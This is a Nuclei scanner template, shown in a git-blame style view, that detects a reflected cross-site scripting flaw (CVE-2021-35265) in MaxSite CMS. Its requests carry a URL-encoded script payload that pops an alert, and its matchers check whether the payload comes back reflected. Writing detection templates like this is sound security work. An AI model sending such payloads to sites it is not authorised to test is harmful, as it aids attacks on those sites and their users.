nuclei-templates/cves/2021/CVE-2021-35265.yaml

40 lines
1.1 KiB
YAML
Raw Normal View History

2021-09-15 04:36:38 +00:00
id: CVE-2021-35265
info:
name: MaxSite CMS XSS
author: pikpikcu
severity: medium
2021-09-16 17:01:41 +00:00
description: Reflected cross-site scripting (XSS) vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page.
2021-09-15 04:36:38 +00:00
reference:
- https://github.com/maxsite/cms/issues/414#issue-726249183
- https://nvd.nist.gov/vuln/detail/CVE-2021-35265
2021-09-21 10:13:08 +00:00
tags: cve,cve2021,maxsite,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-35265
cwe-id: CWE-79
2021-09-15 04:36:38 +00:00
requests:
- method: GET
path:
2021-09-16 17:01:41 +00:00
- '{{BaseURL}}/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-09-15 04:36:38 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-09-16 17:01:41 +00:00
- '</script><script>alert(document.domain)</script>'
2021-09-15 04:36:38 +00:00
part: body
- type: word
part: header
2021-09-16 17:01:41 +00:00
words:
- text/html
2021-09-15 04:36:38 +00:00
- type: status
status:
- 200